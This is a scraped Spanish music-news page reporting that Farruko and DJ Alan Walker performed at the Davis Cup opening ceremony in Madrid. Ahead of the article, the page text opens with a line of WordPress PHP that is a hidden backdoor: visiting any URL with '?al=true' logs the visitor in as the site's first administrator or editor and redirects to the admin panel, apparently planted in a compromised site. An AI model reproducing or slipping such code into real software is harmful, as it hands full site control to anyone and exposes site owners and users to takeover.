// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); Farruko inaugura La Copa Davis - Dicomania Tu Manía
MusicManía

Farruko inaugura La Copa Davis

El puertorriqueño cantó junto a Alan Walker.

La Copa Davis​ que se celebra en Madrid dio su puntapié inicial a una intensa semana de tenis con una ceremonia de inauguración en la que la música fue protagonista.

El show se dio con  las luces del recinto apagado y los focos alumbrando el centro de la pista, dos bailarines de danza recrearon un partido de tenis con una pelota imaginaria y unos pasos de ballet al compás de la música clásica, después uno a uno y pasaron al lado del trofeo de la ‘Ensaladera’, los dieciocho equipos.

Los equipos más aplaudidos fueron la vigente campeona, Croacia, y España, que en su condición de anfitriona se llevó todos los flashes de los teléfonos móviles del público.

Advertisements

La ceremonia concluyó con la música del puertorriqueño Farruko y el DJ Alan Walker, que hicieron bailar a los espectadores que acudieron a la inauguración.

 

Click to comment

Leave a Reply

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

To Top